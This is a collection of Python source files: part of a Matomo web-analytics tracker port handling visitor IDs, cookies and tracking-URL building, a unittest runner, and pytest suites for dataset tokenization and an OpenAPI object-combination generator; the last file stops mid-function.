    * @param string visitor_id 16 hexadecimal characters visitor ID, eg. "33c31e01394bdc63"
    * @return self
    * @throws Exception when the id has the wrong length or non-hex characters
    """
    hex_chars = "01234567890abcdefABCDEF"
    # Valid ids are exactly LENGTH_VISITOR_ID chars, all drawn from hex_chars.
    is_valid = len(visitor_id) == self.LENGTH_VISITOR_ID and strspn(
        visitor_id, hex_chars
    ) == len(visitor_id)
    if not is_valid:
        raise Exception(
            "set_visitor_id() expects a "
            + str(self.LENGTH_VISITOR_ID)
            + " characters hexadecimal string (containing only the following: "
            + hex_chars
            + ")"
        )
    self.forcedVisitorId = visitor_id
    return self
def get_visitor_id(self):
    """
    Returns the visitor ID in effect for this request, in priority order:
    1. an ID forced via set_visitor_id();
    2. the ID parsed from the Matomo first party cookie (when the request was
       initiated by the actual visitor and the cookie is readable);
    3. the random visitor ID assigned to this tracker object (useful when the
       call is triggered server-side by a cron or script) — keep it if you
       wish to record more visits, actions or goals for this visitor later.
    * @return string 16 hex chars visitor ID string
    """
    if self.forcedVisitorId:
        return self.forcedVisitorId
    return (
        self.cookieVisitorId
        if self.load_visitor_id_cookie()
        else self.randomVisitorId
    )
def get_user_agent(self):
    """
    Returns the currently configured User-Agent string.
    * @return string
    """
    return self.user_agent
def get_ip(self):
    """
    Returns the currently configured IP address.
    * @return string
    """
    return self.ip
def get_user_id(self):
    """
    Returns the User ID string, which may have been set via:
    v.set_user_id('username@example.org')
    * @return string|False
    """
    return self.user_id
def load_visitor_id_cookie(self):
    """
    Loads visitor information from the first-party "id" cookie.
    * @return bool True if the cookie exists and is valid, False otherwise
    """
    id_cookie = self.get_cookie_matching_name("id")
    if not id_cookie:
        return False
    visitor_id, *rest = id_cookie.split(".")
    if len(visitor_id) != self.LENGTH_VISITOR_ID:
        return False
    # Storing the cookie value keeps get_visitor_id() backward compatible:
    # it must keep returning any previously issued VisitorId value.
    self.cookieVisitorId = visitor_id
    self.createTs = rest[0]
    return True
def delete_cookies(self):
    """
    Deletes all Matomo first party cookies from the client by expiring each
    of them one day in the past.
    """
    for cookie_name in ("id", "ses", "cvar", "ref"):
        self.set_cookie(cookie_name, None, -86400)
def get_attribution_info(self):
    """
    Returns the currently assigned Attribution Information: the value set via
    set_attribution_info() (re-encoded as JSON) when present, otherwise the
    'ref' first party cookie. Reading the cookie only works if the user is
    initiating the current request and their cookies are readable.
    * @return string JSON Encoded string containing the Referrer information for Goal conversion attribution.
        Will return False if the cookie could not be found
    * @see matomo.js get_attribution_info()
    """
    if self.attributionInfo:
        return json.dumps(self.attributionInfo)
    return self.get_cookie_matching_name("ref")
def set_token_auth(self, token_auth):
    """
    Sets the token_auth required by parts of the Tracking API that need
    express authentication (Super User token, or a user with 'admin' access
    to the website), e.g.:
    - forcing the visitor IP
    - forcing the date & time of the tracking requests
    * @param string token_auth 32 chars token_auth string
    * @return self
    """
    self.token_auth = token_auth
    return self
def set_local_time(self, t):
    """
    Sets the visitor's local time.
    * @param string t HH:MM:SS format
    * @return self
    Note: the components are stored as strings, exactly as split from t.
    """
    self.local_hour, self.local_minute, self.local_second = t.split(":")
    return self
def set_resolution(self, width, height):
    """
    Sets the user's screen resolution.
    * @param int width
    * @param int height
    * @return self
    """
    self.width = width
    self.height = height
    return self
def set_browser_has_cookies(self, b):
    """
    Declares whether the browser supports cookies; reported in the
    "List of plugins" report in Matomo.
    * @param bool b
    * @return self
    """
    self.hasCookies = b
    return self
def set_debug_string_append(self, string):
    """
    Appends a custom string at the end of every tracking request URL
    (debugging aid).
    * @param string string
    * @return self
    """
    self.DEBUG_APPEND_URL = "&" + string
    return self
def set_plugins(
    self,
    flash=False,
    java=False,
    quick_time=False,
    real_player=False,
    pdf=False,
    windows_media=False,
    silverlight=False,
):
    """
    Sets the browser plugins supported by the visitor.
    * @param bool flash
    * @param bool java
    * @param bool quick_time
    * @param bool real_player
    * @param bool pdf
    * @param bool windows_media
    * @param bool silverlight
    * @return self
    """
    # Each plugin flag is encoded as its tracking-API query parameter with
    # a 0/1 value, in the same fixed order the PHP tracker emits them.
    flags = (
        ("fla", flash),
        ("java", java),
        ("qt", quick_time),
        ("realp", real_player),
        ("pdf", pdf),
        ("wma", windows_media),
        ("ag", silverlight),
    )
    self.plugins = "".join(f"&{key}={int(enabled)}" for key, enabled in flags)
    return self
def disable_cookie_support(self):
    """
    Stop reading first-party cookies from the request and writing updated
    cookies in the response (both are on by default).
    """
    self.configCookiesDisabled = True
def get_request_timeout(self):
    """
    Return how many seconds at most the tracker waits for Matomo's
    response (600 by default).
    """
    return self.requestTimeout
def set_request_timeout(self, timeout):
    """
    Set the maximum number of seconds the tracker will spend waiting for a
    response from Matomo.
    * @param int timeout
    * @return self
    * @throws Exception when timeout is not a non-negative int
    """
    if not is_int(timeout) or timeout < 0:
        # Fixed: the original message printed the literal word "timeout"
        # instead of the rejected value.
        raise Exception(f"Invalid value supplied for request timeout: {timeout}")
    self.requestTimeout = timeout
    return self
def set_request_method_non_bulk(self, method):
    """
    Select POST (recommended with set_token_auth(), so the token does not
    land in server logs) or GET for non-bulk requests. Avoid redirects with
    POST to prevent losing POST values; note Log Analytics cannot replay
    POST requests.
    * @param string method Either 'POST' or 'get'
    * @return self
    """
    wants_post = method.upper() == "POST"
    self.request_method = "POST" if wants_post else "GET"
    return self
def set_proxy(self, proxy, proxy_port=80):
    """
    Configure the proxy used to look up the address of the Matomo site.
    * @param string proxy IP as string, for example "173.234.92.107"
    * @param int proxy_port
    """
    self.proxy, self.proxy_port = proxy, proxy_port
def get_proxy(self):
    """
    Return "ip:port" (e.g. "173.234.92.107:80") when both proxy parts were
    configured via set_proxy(), otherwise None.
    """
    if not (self.proxy and self.proxy_port):
        return None
    return f"{self.proxy}:{self.proxy_port}"
"""
Used in tests to output useful error messages.
* @ignore
"""
DEBUG_LAST_REQUESTED_URL = False
"""
* @ignore
"""
def send_request(self, url, method="get", data=None, force=False):
    # Abstract transport hook: concrete subclasses must implement the
    # actual HTTP request to the Matomo endpoint.
    raise NotImplementedError("Missing send_request implementation")
def get_timestamp(self):
    """
    Return the current UNIX timestamp, or the forced timestamp/datetime if
    one was set.
    * @return string|int
    """
    if self.forcedDatetime:
        # Fixed: "%Y" (4-digit year). The original "%y" only matched
        # 2-digit years and would raise on Matomo-style datetimes such as
        # "2011-04-05 23:55:02" (assumes forced datetimes use 4-digit
        # years as the Matomo cdt parameter does -- TODO confirm setter).
        return datetime.strptime(self.forcedDatetime, "%Y-%m-%d %H:%M:%S").timestamp()
    return time.time()
def get_base_url(self):
    """
    Returns the base URL for the Matomo server, ensuring it ends with the
    matomo.php endpoint. May mutate self.URL.
    """
    if not self.URL:
        raise Exception(
            (
                "You must first set the Matomo Tracker URL by calling "
                "MatomoTracker.URL = 'http://your-website.org/matomo/'"
            )
        )
    # Append the endpoint only when the URL does not already point at
    # matomo.php / proxy-matomo.php. strpos presumably mirrors PHP's
    # strpos, returning False when the needle is absent -- TODO confirm.
    if (
        strpos(self.URL, "/matomo.php") is False
        and strpos(self.URL, "/proxy-matomo.php") is False
    ):
        self.URL = self.URL.rstrip("/")
        self.URL += "/matomo.php"
    return self.URL
"""
* @ignore
"""
def get_request(self, id_site):
    """
    Build the full tracking-request URL for the given site id.

    Collects every configured parameter (visitor, page, attribution,
    geolocation, performance timings, custom variables/dimensions) into a
    query string, then resets the page-level state so the next page view
    starts clean.
    * @param id_site site id (int or str)
    * @return string
    * @ignore
    """
    self.set_first_party_cookies()
    custom_fields = ""
    if self.customParameters:
        custom_fields = "&" + urlencode_plus(self.customParameters)
    custom_dimensions = ""
    if self.customDimensions:
        custom_dimensions = "&" + urlencode_plus(self.customDimensions)
    base_url = self.get_base_url()
    start = "?"
    if strpos(base_url, "?"):
        start = "&"
    url = (
        base_url
        + start
        + "idsite="
        + str(id_site)  # fixed: cast, callers may pass the site id as int
        + "&rec=1"
        + "&apiv="
        + str(self.VERSION)
        + "&r="
        + str(random.randint(0, 2147483647))[2:8]
        + ("&cip=" + self.ip if self.ip and self.token_auth else "")
        + ("&uid=" + urlencode_plus(self.user_id) if self.user_id else "")
        + ("&cdt=" + urlencode_plus(self.forcedDatetime) if self.forcedDatetime else "")
        + ("&new_visit=1" if self.forcedNewVisit else "")
        + "&_idts="
        + str(self.createTs)
        # Fixed inverted condition: append the plugins string when it IS
        # set (the original appended it only when empty, i.e. never).
        + (self.plugins if self.plugins else "")
        + (
            "&h="
            + self.local_hour
            + "&m="
            + self.local_minute
            + "&s="
            + self.local_second
            if self.local_hour and self.local_minute and self.local_second
            else ""
        )
        + (
            "&res=" + str(self.width) + "x" + str(self.height)
            if self.width and self.height
            else ""
        )
        # NOTE(review): str(True) emits "True" rather than "1" -- confirm
        # the Matomo endpoint accepts it before changing.
        + ("&cookie=" + str(self.hasCookies) if self.hasCookies else "")
        + ("&data=" + self.customData if self.customData else "")
        + (
            "&_cvar=" + urlencode_plus(json.dumps(self.visitorCustomVar))
            if self.visitorCustomVar
            else ""
        )
        + (
            "&cvar=" + urlencode_plus(json.dumps(self.pageCustomVar))
            if self.pageCustomVar
            else ""
        )
        + (
            "&e_cvar=" + urlencode_plus(json.dumps(self.eventCustomVar))
            if self.eventCustomVar
            else ""
        )
        + (
            "&cid=" + self.forcedVisitorId
            if self.forcedVisitorId
            else "&_id=" + self.get_visitor_id()
        )
        + "&url="
        + urlencode_plus(self.pageUrl)
        + "&urlref="
        + urlencode_plus(self.urlReferrer)
        + (
            "&cs=" + self.pageCharset
            if (
                self.pageCharset
                and self.pageCharset != self.DEFAULT_CHARSET_PARAMETER_VALUES
            )
            else ""
        )
        + ("&pv_id=" + urlencode_plus(self.idPageview) if self.idPageview else "")
        + (
            "&_rcn=" + urlencode_plus(self.attributionInfo[0])
            if self.attributionInfo and self.attributionInfo[0]
            else ""
        )
        + (
            "&_rck=" + urlencode_plus(self.attributionInfo[1])
            if self.attributionInfo and self.attributionInfo[1]
            else ""
        )
        + (
            "&_refts=" + self.attributionInfo[2]
            if self.attributionInfo and self.attributionInfo[2]
            else ""
        )
        + (
            "&_ref=" + urlencode_plus(self.attributionInfo[3])
            if self.attributionInfo and self.attributionInfo[3]
            else ""
        )
        + ("&country=" + urlencode_plus(self.country) if self.country else "")
        # Fixed mojibake: the literal "&reg" had been HTML-entity-decoded
        # to the "(R)" symbol, corrupting the query parameter.
        + ("&region=" + urlencode_plus(self.region) if self.region else "")
        + ("&city=" + urlencode_plus(self.city) if self.city else "")
        + ("&lat=" + urlencode_plus(str(self.lat)) if self.lat else "")
        + ("&long=" + urlencode_plus(str(self.long)) if self.long else "")
        + custom_fields
        + custom_dimensions
        + ("&send_image=0" if not self.sendImageResponse else "")
        + self.DEBUG_APPEND_URL
    )
    # Page performance timings only make sense for an identified page view.
    if self.idPageview:
        url += (
            ("&pf_net=" + str(self.networkTime) if self.networkTime else "")
            + ("&pf_srv=" + str(self.serverTime) if self.serverTime else "")
            + ("&pf_tfr=" + str(self.transferTime) if self.transferTime else "")
            + ("&pf_dm1=" + str(self.domProcessingTime) if self.domProcessingTime else "")
            + ("&pf_dm2=" + str(self.domCompletionTime) if self.domCompletionTime else "")
            + ("&pf_onl=" + str(self.onLoadTime) if self.onLoadTime else "")
        )
    self.clear_performance_timings()
    for key in self.ecommerceView:
        url += "&" + key + "=" + urlencode_plus(self.ecommerceView[key])
    # Reset page level custom variables after this page view
    self.ecommerceView = {}
    self.pageCustomVar = {}
    self.eventCustomVar = {}
    self.clear_custom_dimensions()
    self.clear_custom_tracking_parameters()
    # force new visit only once, user must call again set_force_new_visit()
    self.forcedNewVisit = False
    return url
def get_cookie_matching_name(self, name):
    """
    Returns a first party cookie which name contains name
    * @param string name
    * @return string String value of cookie, or None if not found
    * @ignore
    """
    # No lookup when cookie support is disabled or the request has no cookies.
    if self.configCookiesDisabled or not self.request.cookie.get_dict():
        return None
    name = self.get_cookie_name(name)
    # Matomo cookie names use dots separators in matomo.js,
    # but PHP Replaces + with _ http://www.php.net/manual/en/language.variables.predefined.php#72571
    name = name.replace(".", "_")
    for cookie_name, cookie_value in self.request.cookie.items():
        # NOTE(review): strpos(name, cookie_name) searches for cookie_name
        # inside the requested name; the docstring implies the opposite
        # direction -- confirm argument order of the strpos helper.
        if strpos(name, cookie_name):
            return cookie_value
    return None
def get_current_script_name(self):
    """
    Return the path component of the current request URL, e.g.
    "/dir1/dir2/index.php" for
    "http://example.org/dir1/dir2/index.php?param1=value1&param2=value2".
    * @return string
    * @ignore
    """
    if self.request.get("PATH_INFO"):
        path = self.request.get("PATH_INFO")
    elif self.request.get("REQUEST_URI"):
        # Strip the query-string part from the request URI.
        path = self.request.get("REQUEST_URI", "").split("?")[0]
    else:
        path = ""
    if not path:
        # Empty values fall back to SCRIPT_NAME, then to the root path.
        path = self.request.get("SCRIPT_NAME") or "/"
    if not path.startswith("/"):
        path = "/" + path
    return path
def get_current_scheme(self):
    """
    Return the scheme of the current request URL: 'https' when the HTTPS
    flag is "on" or True, otherwise 'http'.
    * @return string 'https' or 'http'
    * @ignore
    """
    flag = self.request.get("HTTPS") if "HTTPS" in self.request else None
    if flag == "on" or flag is True:
        return "https"
    return "http"
def get_current_host(self):
    """
    Return the host of the current request (e.g. "example.org"),
    or "unknown" when the request carries no HTTP_HOST.
    * @return string
    * @ignore
    """
    return self.request.get("HTTP_HOST", "unknown")
def get_current_query_string(self):
    """
    Return the query-string part of the current URL including the leading
    "?" (e.g. "?param1=value1&param2=value2"), or "" when there is none.
    * @return string
    * @ignore
    """
    query = self.request.get("QUERY_STRING")
    return "?" + query if query else ""
def get_current_url(self):
    """
    Return the current full URL: scheme, host, path and query string.
    * @return string
    * @ignore
    """
    return (
        self.get_current_scheme()
        + "://"
        + self.get_current_host()
        + self.get_current_script_name()
        + self.get_current_query_string()
    )
def set_first_party_cookies(self):
    """
    Sets the first party cookies as would the matomo.js
    All cookies are supported: 'id' and 'ses' and 'ref' and 'cvar' cookies.
    * @return self
    """
    # No-op when cookie support has been disabled.
    if self.configCookiesDisabled:
        return self
    # Reload the visitor id from its cookie first so the 'id' cookie written
    # below stays consistent with what the browser already holds.
    if self.cookieVisitorId:
        self.load_visitor_id_cookie()
    # Set the 'ref' cookie
    attribution_info = self.get_attribution_info()
    if attribution_info:
        self.set_cookie("ref", attribution_info, self.configReferralCookieTimeout)
    # Set the 'ses' cookie
    self.set_cookie("ses", "*", self.configSessionCookieTimeout)
    # Set the 'id' cookie
    cookie_value = (
        self.get_visitor_id()
        + "."
        + str(self.createTs)
    )
    self.set_cookie("id", cookie_value, self.configVisitorCookieTimeout)
    # Set the 'cvar' cookie
    self.set_cookie(
        "cvar", json.dumps(self.visitorCustomVar), self.configSessionCookieTimeout
    )
    return self
def set_cookie(self, cookie_name, cookie_value, cookie_ttl):
    """
    Set a first-party cookie on the client, mirroring the matomo.js tracker
    algorithms for consistent dual JS/server tracking and better accuracy.
    * @param cookie_name
    * @param cookie_value
    * @param cookie_ttl lifetime in seconds, added to the current timestamp
    * @return self
    """
    expires_at = self.currentTs + cookie_ttl
    self.request.cookie.set(cookie_name, cookie_value, expires=expires_at)
    return self
def get_cookies(self):
    """Return the cookie jar attached to the current request."""
    return self.request.cookie
def get_custom_variables_from_cookie(self):
    """
    Load visitor custom variables from the 'cvar' first-party cookie.
    * @return bool|mixed False when the cookie is absent, else the decoded JSON
    """
    raw = self.get_cookie_matching_name("cvar")
    return json.loads(raw) if raw else False
def set_outgoing_tracker_cookie(self, name, value=None):
    """
    Set (or remove) a cookie to be sent to the tracking server.

    Passing value=None removes the cookie. Removal is a no-op when the
    cookie was never set (the original raised KeyError, unlike the PHP
    unset() it ports).
    * @param name
    * @param value
    """
    if value is None:
        self.outgoingTrackerCookies.pop(name, None)
    else:
        self.outgoingTrackerCookies[name] = value
def get_incoming_tracker_cookie(self, name):
    """
    Look up a cookie which was set by the tracking server.
    * @param name
    * @return bool|string the cookie value, or False when absent
    """
    cookies = self.incomingTrackerCookies
    if name in cookies:
        return cookies[name]
    return False
def parse_incoming_cookies(self, headers):
    """
    Read tracking-server cookies out of HTTP response headers.

    Scans *headers* for "Set-Cookie:" lines, keeps only the cookie pair
    (dropping attributes after the first ";"), and stores the parsed result
    in self.incomingTrackerCookies (last matching header wins).
    * @param array headers Array with HTTP response headers as values
    """
    self.incomingTrackerCookies = {}
    # Fixed: the original guarded the parsing loop with "if not headers:",
    # so real headers were never scanned.
    if not headers:
        return
    header_name = "set-cookie:"
    header_name_length = len(header_name)
    for header in headers:
        # startswith replaces the strpos(...) != 0 check, which mishandled
        # headers not containing "set-cookie:" at all (PHP-style False == 0).
        if not header.lower().startswith(header_name):
            continue
        cookies = header[header_name_length:].strip()
        pos_end = cookies.find(";")
        if pos_end != -1:
            # Keep only the "name=value" pair, drop cookie attributes.
            cookies = cookies[:pos_end]
        self.incomingTrackerCookies = parse_qs(cookies)
def matomo_get_url_track_page_view(request, id_site, document_title=""):
    """
    Convenience helper: build the page-view tracking URL in a single call.
    * @param id_site
    * @param string document_title
    * @return string
    """
    return MatomoTracker(request, id_site).get_url_track_page_view(document_title)
def matomo_get_url_track_goal(request, id_site, id_goal, revenue=0.0):
    """
    Convenience helper: build the goal tracking URL in a single call.
    * @param id_site
    * @param id_goal
    * @param float revenue
    * @return string
    """
    return MatomoTracker(request, id_site).get_url_track_goal(id_goal, revenue)
|
import argparse
import logging
import unittest
from . import arguments
parser = arguments.test_parser()
args = parser.parse_args()
# --verbose switches the root logger to INFO; otherwise use logging defaults.
if args.verbose:
    logging.basicConfig(level=logging.INFO)
else:
    logging.basicConfig()
if args.test:
    from . import tests
    # --test may be a bare flag (run the whole module) or a dotted test name.
    if args.test is True:
        suite = unittest.defaultTestLoader.loadTestsFromModule(tests)
    else:
        suite = unittest.defaultTestLoader.loadTestsFromName(args.test, tests)
    unittest.TextTestRunner(verbosity=args.verbose + 1).run(suite)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 14 10:23:45 2022
@author: frederikhartmann
"""
# #####################################
# ############# Imports ###############
# #####################################
# Data manipulation
import torch
import os
# Debugging
import pdb
import seaborn as sns
sns.set_style("whitegrid")
import hydra
# Import pytest
import pytest
from src.data.make_dataset import read_data, tokenizer, convert_to_torchdataset
# NB: ENABLE FOR RUNNING SUBSET OF DATA
# Module-level switch; presumably consumed by the data-loading helpers to
# restrict the tests to a reduced subset -- confirm against make_dataset.
subset = True
# testing if data is being read correctly
@pytest.mark.skipif(
    not (
        os.path.exists("data/processed/train_dataset.pt")
        and os.path.exists("data/processed/test_dataset.pt")
    ),
    reason="Data files not found",
)
def test_is_tokenized():
    """Tokenizing the splits must yield encodings with ids and masks.

    Skip unless *both* processed files exist: the test needs the two splits,
    but the original "or" condition ran it when only one file was present.
    """
    # read dataset
    X_train, X_test, y_train, y_test = read_data()
    # Tokenizer
    train_encodings, test_encodings = tokenizer(X_train, X_test)
    # Assert types
    assert hasattr(
        train_encodings, "input_ids"
    ), "Tokenized train data does not have input_ids attribute"
    assert hasattr(
        train_encodings, "attention_mask"
    ), "Tokenized train does not have attention_mask attribute"
    assert hasattr(
        test_encodings, "input_ids"
    ), "Tokenized test data does not have input_ids attribute"
    assert hasattr(
        test_encodings, "attention_mask"
    ), "Tokenized test does not have attention_mask attribute"
@pytest.mark.skipif(
    not (
        os.path.exists("data/processed/train_dataset.pt")
        and os.path.exists("data/processed/test_dataset.pt")
    ),
    reason="Data files not found",
)
def test_is_converted():
    """Every converted sample must expose tensors for ids, mask and label.

    Skip unless *both* processed files exist (the original "or" ran the test
    when only one file was present).
    """
    # read dataset
    X_train, X_test, y_train, y_test = read_data()
    # Tokenizer
    train_encodings, test_encodings = tokenizer(X_train, X_test)
    # Convert
    train_set, test_set = convert_to_torchdataset(train_encodings, test_encodings, y_train, y_test)
    # Assert tensor types for every train sample
    for i in range(len(X_train)):
        sample = train_set[i]
        assert type(sample["input_ids"]) == torch.Tensor, "Train input_ids data not a tensor"
        assert type(sample["attention_mask"]) == torch.Tensor, "Train attention_mask data not a tensor"
        assert type(sample["labels"]) == torch.Tensor, "Train label data not a tensor"
    # The original asserted each test-set sample twice; one pass suffices.
    for i in range(len(X_test)):
        sample = test_set[i]
        assert type(sample["input_ids"]) == torch.Tensor, "Test input_ids data not a tensor"
        assert type(sample["attention_mask"]) == torch.Tensor, "Test attention_mask data not a tensor"
        assert type(sample["labels"]) == torch.Tensor, "Test label data not a tensor"
@pytest.mark.skipif(
    not (
        os.path.exists("data/processed/train_dataset.pt")
        and os.path.exists("data/processed/test_dataset.pt")
    ),
    reason="Data files not found",
)
def test_load_data():
    """read_data() must return all four splits.

    Skip unless *both* processed files exist (the original "or" only skipped
    when neither file was present).
    """
    X_train, X_test, y_train, y_test = read_data()
    assert X_train is not None, "X_train not loaded"
    assert X_test is not None, "X_test not loaded"
    assert y_train is not None, "y_train not loaded"
    assert y_test is not None, "y_test not loaded"
|
import pytest
from ..openapi_data_generator.OptionalCombinationGenerator import generate_all_possible_objects
from ..openapi_data_generator.ObjectGenerator import ObjectsGenerator
from compare_objects import compare_objects
from openapi_schema_generator import OpenApiSchemaValidator, OpenApiSchemaGenerator
src_path = "test/Examples"
validator_jobs = OpenApiSchemaValidator(f"{src_path}/jobs.json")
jobs_schemas = OpenApiSchemaGenerator(f"{src_path}/jobs.json").build_mapped_schema()
validator_petstore = OpenApiSchemaValidator(f"{src_path}/petstore.json")
petstore_schemas = OpenApiSchemaGenerator(f"{src_path}/petstore.json").build_mapped_schema()
config = {'default_probability': 5, 'nullable_probability': 5, 'array_min_items': 0, 'array_max_items': 5,
'min_str_len': 1, 'max_str_len': 10, 'min_int': -2147483648, 'max_int': 2147483647,
'min_float': 3.4 * pow(10, -38), 'max_float': 3.4 * pow(10, 38)}
# ~~~~~~~~~~~~~~~~~~~~~ TEST NATIVE ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def test_two_natives_val_compare():
    """Two distinct scalars pass through unchanged."""
    assert compare_objects(generate_all_possible_objects("require", "full"), ["require", "full"])


def test_native_and_list_val_compare():
    """A scalar paired with a list of scalars."""
    assert compare_objects(generate_all_possible_objects("require", ['native', 'full']), ["require", ['native', 'full']])


def test_two_list_of_native():
    """A set paired with a list of scalars."""
    assert compare_objects(generate_all_possible_objects({'native', "require"}, ['native', 'full']), [{'native', "require"}, ['native', 'full']])


def test_list_and_longer_list_of_native():
    """A shorter list against a longer list."""
    assert compare_objects(generate_all_possible_objects([('native',), "require"], ['native', 'full', 'longer']), [[('native',), "require"], ['native', 'full', 'longer']])


def test_list_and_longer_with_diff_list_of_native():
    """A longer list against a shorter, differing list."""
    assert compare_objects(generate_all_possible_objects(['native', "require", 'longer'], ['native', 'full']), [['native', 'require', 'longer'], ['native', 'full']])
# ~~~~~~~~~~~~~~~~~~~~~ TEST DICT ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def test_single_case_to_dicts():
    """A subset dict against its superset dict."""
    assert compare_objects(generate_all_possible_objects({"a": 1}, {"a": 1, "b": 2}), [{"a": 1}, {"a": 1, "b": 2}])


def test_two_equal_dicts():
    """Identical one-key dicts collapse to a single variant."""
    assert compare_objects(generate_all_possible_objects({"a": 1}, {"a": 1}), [{"a": 1}])


def test_two_bigger_equal_dict():
    """Identical two-key dicts collapse to a single variant."""
    assert compare_objects(generate_all_possible_objects({"a": 1, "b": 2}, {"a": 1, "b": 2}), [{"a": 1, "b": 2}])


def test_diff_of_two_keys():
    """Two optional keys yield all four subset combinations."""
    assert compare_objects(
        generate_all_possible_objects({"a": 1}, {"a": 1, "b": 2, "c": 3}),
        [{'a': 1}, {'a': 1, 'c': 3}, {'a': 1, 'b': 2}, {'a': 1, 'b': 2, 'c': 3}],
    )


def test_two_keys_equal_value_not_equal():
    """Conflicting values: the full object's value wins."""
    assert compare_objects(generate_all_possible_objects({"a": 1, "b": 2}, {"a": 1, "b": 3}), [{'a': 1, 'b': 3}])
# ~~~~~~~~~~~~~~~~~~~~~ TEST DICT WITH DICT INSIDE ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def test_require_have_nested_key():
    """An optional key expands inside a nested dict."""
    variants = generate_all_possible_objects({"a": 1, "b": {"a": 1}}, {"a": 1, "b": {"a": 1, "b": 2}})
    assert compare_objects(variants, [{'a': 1, 'b': {'a': 1}}, {'a': 1, 'b': {'a': 1, 'b': 2}}])


def test_require_nested_has_key_full_doesnt_have():
    """Same fixture as the previous test; kept for parity with the suite."""
    variants = generate_all_possible_objects({"a": 1, "b": {"a": 1}}, {"a": 1, "b": {"a": 1, "b": 2}})
    assert compare_objects(variants, [{'a': 1, 'b': {'a': 1}}, {'a': 1, 'b': {'a': 1, 'b': 2}}])


def test_require_does_not_have_nested_key():
    """A fully-optional nested dict expands key by key."""
    variants = generate_all_possible_objects({"a": 1}, {"a": 1, "b": {"a": 1, "b": 2}})
    assert compare_objects(
        variants,
        [{'a': 1}, {'a': 1, 'b': {'b': 2}}, {'a': 1, 'b': {'a': 1}}, {'a': 1, 'b': {'a': 1, 'b': 2}}],
    )


def test_very_nested_dict():
    """Optional keys three levels deep still produce every combination."""
    variants = generate_all_possible_objects(
        {"a": {"b": {"c": {"d": 1}}}}, {"a": {"b": {"c": {"d": 1, "e": 2, "f": 3}}}}
    )
    assert compare_objects(
        variants,
        [
            {'a': {'b': {'c': {'d': 1}}}},
            {'a': {'b': {'c': {'d': 1, 'f': 3}}}},
            {'a': {'b': {'c': {'d': 1, 'e': 2}}}},
            {'a': {'b': {'c': {'d': 1, 'e': 2, 'f': 3}}}},
        ],
    )
# ~~~~~~~~~~~~~~~~~~~~~ TEST DICT WITH LIST INSIDE ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def test_require_have_nested_list():
    """An optional key expands inside a dict nested in a list."""
    variants = generate_all_possible_objects({"a": 1, "b": [{"a": 1}]}, {"a": 1, "b": [{"a": 1, "b": 2}]})
    assert compare_objects(variants, [{'a': 1, 'b': [{'a': 1}]}, {'a': 1, 'b': [{'a': 1, 'b': 2}]}])


def test_list_have_not_exist_object_at_require():
    """A list element present only in the full object expands key by key."""
    variants = generate_all_possible_objects({"a": 1, "b": [{"a": 1}]}, {"a": 1, "b": [{"a": 1}, {"b": 2, 'c': 3}]})
    assert compare_objects(
        variants,
        [{'a': 1, 'b': [{'a': 1}]}, {'a': 1, 'b': [{'a': 1}, {'b': 2}]}, {'a': 1, 'b': [{'a': 1}, {'c': 3}]},
         {'a': 1, 'b': [{'a': 1}, {'b': 2, 'c': 3}]}],
    )


def test_require_have_nested_list_with_bigger_object():
    """Two optional keys inside a listed dict expand to four combinations."""
    variants = generate_all_possible_objects({"a": 1, "b": [{"a": 1}]}, {"a": 1, "b": [{"a": 1, "b": 2, "c": 4}]})
    assert compare_objects(
        variants,
        [{'a': 1, 'b': [{'a': 1}]}, {'a': 1, 'b': [{'a': 1, 'b': 2}]}, {'a': 1, 'b': [{'a': 1, 'c': 4}]},
         {'a': 1, 'b': [{'a': 1, 'b': 2, 'c': 4}]}],
    )


def test_require_have_nested_list_and_dict():
    """Optional members in both a nested list and a sibling nested dict."""
    variants = generate_all_possible_objects({"a": 1, "b": [{"a": 1}]}, {"a": 1, "b": [{"a": 1, "b": 2}], "c": {"e": 1}})
    assert compare_objects(
        variants,
        [{'a': 1, 'b': [{'a': 1}]}, {'a': 1, 'b': [{'a': 1, 'b': 2}], 'c': {}},
         {'a': 1, 'b': [{'a': 1}], 'c': {'e': 1}},
         {'a': 1, 'b': [{'a': 1, 'b': 2}], 'c': {'e': 1}}],
    )


def test_nested_dict_with_nested_list():
    """A list nested inside a dict nested inside the root dict."""
    variants = generate_all_possible_objects({"a": 1, "n": {"b": [{"a": 1}]}},
                                             {"a": 1, "n": {"b": [{"a": 1, "b": 2, "c": 3}]}})
    assert compare_objects(
        variants,
        [{'a': 1, 'n': {'b': [{'a': 1}]}}, {'a': 1, 'n': {'b': [{'a': 1, 'b': 2}]}},
         {'a': 1, 'n': {'b': [{'a': 1, 'c': 3}]}}, {'a': 1, 'n': {'b': [{'a': 1, 'b': 2, 'c': 3}]}}],
    )


def test_nested_list_with_nested_dict_with_nest_list():
    """List -> dict -> list nesting still expands every optional member."""
    variants = generate_all_possible_objects({"a": 1, "n": [{"b": [{"a": 1}]}]},
                                             {"a": 1, "n": [{"b": [{"a": 1}, {"b": 2, "c": 3}]}]})
    assert compare_objects(
        variants,
        [{'a': 1, 'n': [{'b': [{'a': 1}]}]}, {'a': 1, 'n': [{'b': [{'a': 1}, {'b': 2}]}]},
         {'a': 1, 'n': [{'b': [{'a': 1}, {'c': 3}]}]}, {'a': 1, 'n': [{'b': [{'a': 1}, {'b': 2, 'c': 3}]}]}],
    )
# ~~~~~~~~~~~~~~~~~~~~~ TEST WITH SCHEMAS ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# ~~~~~~~~~~~~~~~~~~~~~ JOBS ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
@pytest.mark.parametrize('curr_key', list(jobs_schemas.keys()))
def test_object_build_successfully_with_schema_jobs(curr_key):
    """Every generated optional combination validates against the jobs schema."""
    endpoint = jobs_schemas[curr_key]
    if "post" not in endpoint or "requestBody" not in endpoint['post']:
        return
    schema = endpoint['post']['requestBody']
    # Distinct names: the original reused `obj` for both the generator and
    # each generated candidate.
    generator = ObjectsGenerator(schema, config)
    for candidate in generate_all_possible_objects(generator.required_object, generator.full_object, schema):
        assert validator_jobs.validate_request_schema(curr_key, candidate)
# ~~~~~~~~~~~~~~~~~~~~~ PET STORE ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
@pytest.mark.parametrize('curr_key', list(petstore_schemas.keys()))
def test_object_build_successfully_with_schema_petstore(curr_key):
